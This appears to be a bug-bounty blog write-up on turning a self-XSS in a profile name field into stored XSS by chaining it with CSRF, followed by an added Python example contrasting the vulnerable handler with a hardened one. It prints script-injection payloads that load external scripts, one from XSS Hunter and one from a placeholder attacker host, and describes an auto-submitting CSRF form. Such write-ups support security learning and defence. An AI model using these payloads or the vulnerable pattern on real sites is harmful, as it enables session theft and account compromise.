Self-XSS + CSRF to Stored XSS

Renwa
May 20, 2018 · 3 min read

Hola, this is Renwa from Kurdistan. I'm glad to write my first write-up about infosec and bug bounties.

So I was digging in the website and finally I found an XSS: when a user wants to change his name, I added a simple payload and refreshed the page. Bingo!

[image: user settings panel]
[image: XSS proof]

So the problem is that the profile is not public, and the only way to trigger the XSS is to tell the victim to change his name to malicious JavaScript code. That is called Self-XSS, and on its own it has no impact.

I started Burp Suite and changed my name. The request looks like:

[image]

Hmm, that looks interesting. I generated a Burp Suite CSRF PoC.

[image]

Replayed in the browser, the response was:

[image]

Awesome! Now we have CSRF + Self-XSS. Let's chain them together; the form now looks like:

[image: Final POC]

As you can see, in the last name field I have added the JavaScript code. It's from xsshunter.com, which generates XSS PoCs; you should give it a try.

“><script src=https://***.xss.ht></script>

And at the end I have added JavaScript that submits the form when the file loads, to make it more effective.

Now the user's name is changed to the JavaScript code. After he navigates to the homepage, the code runs in his browser and sends back all the info we need, since there wasn't any CSP protection.
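As an added example (not the author's code and not the affected site's), here is the server-side pattern the write-up describes, modelled in plain Python with only the standard library, beside a hardened version. The vulnerable handler accepts any POST carrying the session cookie and echoes the stored name raw into HTML; the hardened one demands a per-session CSRF token and a same-site Origin, encodes the name on output, and sets the CSP and SameSite cookie attributes that would have blunted the chain. The in-memory store, SITE_ORIGIN, the Request/Session classes and the attacker.invalid placeholder host are all assumptions made for the example.

```python
import hmac
import html
import secrets
from dataclasses import dataclass, field

# Assumed origin of the site for this example; a deployment uses its own.
SITE_ORIGIN = "https://app.example"


@dataclass
class Session:
    """Server-side session for one logged-in user, with a CSRF token."""
    user_id: int
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    form: dict
    headers: dict


# --- vulnerable pattern: the behaviour the write-up describes --------------

def update_profile_vulnerable(store, req, session):
    # No CSRF check: a cross-site auto-submitting form riding the victim's
    # cookie changes the victim's name. Returns an HTTP-style status code.
    store[session.user_id] = {"first": req.form.get("first_name", ""),
                              "last": req.form.get("last_name", "")}
    return 200


def render_profile_vulnerable(profile):
    # Name echoed raw into the page, so the stored string becomes markup.
    return f"<h1>Hello {profile['first']} {profile['last']}</h1>"


# --- hardened pattern ------------------------------------------------------

def csrf_ok(req, session):
    # Synchronizer token: the form must carry this session's token, compared
    # in constant time. A form hosted elsewhere cannot read it, so it fails.
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return False
    # Defence in depth: Origin (or Referer) must be our own site.
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    return origin == SITE_ORIGIN or origin.startswith(SITE_ORIGIN + "/")


def update_profile_hardened(store, req, session):
    if req.method != "POST":
        return 405
    if not csrf_ok(req, session):
        return 403
    store[session.user_id] = {"first": req.form.get("first_name", ""),
                              "last": req.form.get("last_name", "")}
    return 200


def render_profile_hardened(profile):
    # HTML-context output encoding: <, >, &, " and ' become entities.
    return (f"<h1>Hello {html.escape(profile['first'])} "
            f"{html.escape(profile['last'])}</h1>")


def response_headers():
    # CSP refuses the external script src even if the markup slips through;
    # SameSite=Lax keeps the session cookie off cross-site top-level POSTs.
    return {"Content-Security-Policy": "default-src 'self'; script-src 'self'",
            "Set-Cookie": "session=<id>; Secure; HttpOnly; SameSite=Lax"}


# Constructed test string in the shape of the write-up's payload (placeholder host).
PAYLOAD = '"><script src=https://attacker.invalid/probe.js></script>'


def cross_site_request(first, last):
    # What a CSRF form delivers: the cookie rides along, but there is no token
    # and the browser sends a foreign Origin.
    return Request("POST", {"first_name": first, "last_name": last},
                   {"Origin": "https://attacker.invalid"})


def same_site_request(first, last, session):
    return Request("POST", {"first_name": first, "last_name": last,
                            "csrf_token": session.csrf_token},
                   {"Origin": SITE_ORIGIN})


def demo():
    session = Session(user_id=7)
    vuln_store, safe_store, r = {}, {}, {}
    # Vulnerable: the cross-site update lands and renders as a script tag.
    r["vuln_status"] = update_profile_vulnerable(vuln_store, cross_site_request("Bob", PAYLOAD), session)
    r["vuln_html"] = render_profile_vulnerable(vuln_store[7])
    # Hardened: the cross-site update is refused, and a legitimate update of
    # the same string is stored but renders inert.
    r["csrf_status"] = update_profile_hardened(safe_store, cross_site_request("Bob", PAYLOAD), session)
    r["legit_status"] = update_profile_hardened(safe_store, same_site_request("Bob", PAYLOAD, session), session)
    r["safe_html"] = render_profile_hardened(safe_store[7])
    return r


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Running `demo()` shows the two halves of the chain broken independently: the CSRF token plus Origin check turns the cross-site name change into a 403, and output encoding means that even a name legitimately set to the same string renders as text rather than a script tag. Either fix alone would have stopped this particular report; together with the CSP and SameSite headers they also cover the case where one layer is later misconfigured.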

[image: Stored XSS]

Going back to XSS Hunter, we can confirm it became a Stored XSS whenever a user opens our HTML form.

[image]

Thanks for reading. If this helped, clap for more write-ups about infosec. Remember: where there is Self-XSS, always look for CSRF to chain it with and make it stored. By Self-XSS I don't mean a user pasting code into the browser console or self-DOM XSS.

//Renwa
